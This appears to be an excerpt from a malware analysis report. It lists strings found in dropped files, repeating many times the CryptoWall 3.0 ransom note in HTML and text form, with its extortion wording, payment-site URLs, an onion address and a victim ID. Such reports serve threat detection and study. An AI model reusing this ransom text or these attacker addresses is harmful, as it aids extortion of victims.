Source: restore_files_gpmus.html226.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html267.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html271.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt174.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt292.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt181.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt402.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt397.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt423.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html403.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt261.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt384.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt41.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html53.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt126.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html301.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt291.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt116.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html364.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt374.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.txt229.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html149.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt270.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html161.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.html264.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt331.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html342.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.<br> If you really need your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.</font><br><br><div class="tb" style="color:#880000; font-size:13px; border-width:3px;">For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below: <hr><b>1.<a href="http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B" target="_blank">http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B</a></b><br><b>2.<a href="http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B" target="_blank">http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B</a></b><br><b>3.<a href="https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B" target="_blank">https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B</a></b><br></div><br><div class="tb" style="font-size:13px; border-color:#880000;">If for some reasons the addresses are not available, follow these steps: <hr>1. Download and install tor-browser: <a href="http://www.torproject.org/projects/torbrowser.html.en" target="_blank">http://www.torproject.org/projects/torbrowser.html.en</a><br>2. After a successful installa
Source: restore_files_gpmus.txt413.2.drString found in binary or memory : Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Source: restore_files_gpmus.html265.2.drString found in binary or memory : <html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, you will not be able to work<br> with them, read them or see them, it is the same thing as losing them forever, but with our help, you can restore them.</font><br><br><b><font class="ttl">How did this happen?</b></font> <br> <font style="font-size:13px;"> Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.<br>All your files were encrypted with the public key, which has been transferred to your computer via the Internet.<br> Decrypting of YOUR FILES is only possible with the help of the private key and decrypt program, which is on our SECRET SERVER!!!.</font><br><br><b><font class="ttl">What do I do?</b></font> <br><font style="font-size:13px;">Alas, if you do 